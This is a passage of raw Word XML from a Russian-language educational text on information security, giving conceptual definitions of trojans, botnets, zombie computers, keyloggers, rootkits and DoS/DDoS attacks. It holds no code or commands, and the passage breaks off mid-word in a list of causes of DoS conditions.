      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Троянские программы крайне просты в написании: простейшие из них состоят из нескольких десятков строк кода на Delphi или C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Название «троянская программа» происходит от названия «троянский конь» — деревянный конь, по легенде, подаренный древними греками жителям Трои, внутри которого прятались воины, впоследствии открывшие завоеват</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лям ворота города. Такое название, прежде всего, отражает скрытность и п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тенциальное коварство истинных замыслов разработчика программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для того, чтобы спровоцировать пользователя запустить троянца, файл программы (его название, иконку программы) называют служебным именем, маскируют под другую программу (например, установки другой программы), файл другого типа или просто дают привлекательное для запуска название, иконку и т. п. Злоумышленник может перекомпилировать существующую пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамму, добавив к её исходному коду вредоносный, а потом выдавать за ориг</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нал или подменять его.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При заражении большого количества компьютеров одним вирусом во</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>можна организаця ботнета.</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Ботнет (англ. botnet от robot и network) — это компьютерная сеть, сост</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ящая из некоторого количества компьютеров, с запущенными программами-ботами. Чаще всего бот в составе ботнета является программой, скрытно уст</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>навливаемой на компьютере жертвы и позволяющей злоумышленнику выпо</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>л</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нять некие действия с использованием ресурсов заражённого компьютера. Обычно используются для нелегальной или неодобряемой деятельности — ра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сылки спама, перебора паролей на удалённой системе, атак на отказ в обслуж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">вании. </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Управление обычно получают в результате установки на компьютер н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>видимого необнаруживаемого пользователем в ежедневной работе програм</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ного обеспечения без ведома пользователя. Происходит обычно через:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Заражение компьютера вирусом через уязвимость в ПО (ошибки в бра</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">зерах, почтовых клиентах, программах просмотра документов, изображений, видео). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- Использование неопытности или невнимательности пользователя — маскировка под «полезное содержимое». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- Использование санкционированного доступа к компьютеру (редко). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- Перебор вариантов администраторского пароля к сетевым разделяемым ресурсам (в частности, к $ADMIN, позволяющей выполнить удалённо пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">грамму) — преимущественно в локальных сетях. </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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ботнеты состоят из компьютеров-зомби.</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«Компью́тер-зо́мби» — компьютер в сети, используемый третьими лиц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ми без ведома владельца, например для доступа в закрытую или коммерческую сеть (например Интернет), использования вычислительных ресурсов (кластер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зации), рассылки спама, и т. п. Используются зомби-компьютеры также и с ц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лями, схожими с целью, с которыми используются открытые прокси.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Компьютеры-зомби являются одним из наиболее эффективных инстр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ментов по рассылке спама — так, они ответственны за 50-80% мирового траф</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ка спама.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как правило, «зомбирование» осуществляется с помощью троянской пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>граммы, которая устанавливает необходимую злоумышленнику фоновую зад</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чу.</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Keylogger (кейлоггер) — (англ. key — клавиша и logger — регистриру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щее устройство) — это программное обеспечение или аппаратное устройство, регистрирующее каждое нажатие клавиши на клавиатуре компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программные кейлоггеры принадлежат к той группе программных пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дуктов, которые осуществляют контроль над деятельностью пользователя пе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сонального компьютера. Первоначально программные продукты этого типа предназначались исключительно для записи информации о нажатиях клавиш клавиатуры, в том числе и системных, в специализированный журнал регистр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ции (лог-файл), который впоследствии изучался человеком, установившим эту программу. Лог-файл мог отправляться по сети на сетевой диск, FTP сервер в сети Интернет, по E-mail и т. д. В настоящее время программные продукты, с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хранившие «по старинке» данное название, выполняют много дополнительных функций — это перехват информации из окон, перехват кликов мыши, перехват буфера обмена, «фотографирование» снимков экрана и активных окон, ведение учета всех полученных и отправленных E-mail, мониторинг файловой активн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сти, мониторинг системного реестра, мониторинг очереди заданий, отправле</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных на принтер, перехват звука с микрофона и видео-изображения с веб-камеры, подключенных к компьютеру и т. д., то есть они, на самом деле, отн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сятся к совершенно другому классу программных продуктов, а именно к мон</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>торинговым программным продуктам.</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Руткит (англ. rootkit, т.е. «набор root'а») — программа или набор пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамм для скрытия следов присутствия злоумышленника или вредоносной пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>граммы в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Термин Rootkit</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> исторически пришёл из мира UNIX, и под этим терм</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ном понимается набор утилит или специальный модуль ядра, которые взло</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щик устанавливает на взломанной им компьютерной системе. Этот набор, как правило, включает в себя разнообразные утилиты для «заметания следов» вторжения в систему, снифферы, сканеры, кейлоггеры, троянские программы, замещающие основные утилиты UNIX. Rootkit позволяет взломщику закр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>питься во взломанной системе и скрыть следы своей деятельности путём с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>крытия файлов, процессов, а также самого присутствия руткита в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В Windows из-за Windows File Protection переписывание системных фа</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лов затруднено (хотя и его можно обойти!), поэтому основные способы внедр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния в систему —</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>модификация памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">перехват системных функций Windows API (API hooking) на уровне пользователя; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">то же на уровне ядра (перехват Native API); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">изменение системных структур данных; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">модификация MBR и загрузка до ядра операционной системы — буткиты (известный представитель BackDoor.MaosBoot). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данный вид вредоносных кодов очень давно известен в мире Windows и с начала 90х годов прошлого столетия носит название стелс-вируса (Stealth). Кроме того, руткиту нужно как-то поставить себя на автозапуск. Нельзя не пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>знать, что в Windows для этого существуют способы помимо «стандартных».</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szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Атаки на вычислительные системы</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DoS-атака (от англ. Denial of Service, отказ в обслуживании) — атака на вычислительную систему с целью вывести её из строя, то есть создание таких условий, при которых легитимные (правомерные) пользователи системы не м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>гут получить доступ к предоставляемым системой ресурсам, либо этот доступ затруднён. Отказ «вражеской» системы может быть как самоцелью (например, сделать недоступным популярный сайт), так и одним из шагов к овладению с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемой (если во внештатной ситуации ПО выдаёт какую-либо критическую и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>формацию — например, версию, часть программного кода и т. д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если атака выполняется одновременно с большого числа компьютеров, говорят о DDoS-атаке (от англ. Distributed Denial of Service, распределённая атака типа «отказ в обслуживании»). В некоторых случаях к DDoS-атаке пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>водит легитимное действие, например, простановка ссылки на сайт (размещё</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ный на не очень производительном сервере) на популярном интернет-ресурсе (слэшдот-эффект). Большой наплыв пользователей приводит к превышению допустимой нагрузки на сервер и отказу в обслуживании части из них.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Существуют различные причины, по которым может возникнуть DoS-условие:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Ошибка в программном коде, приводящая к обращению к неиспольз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
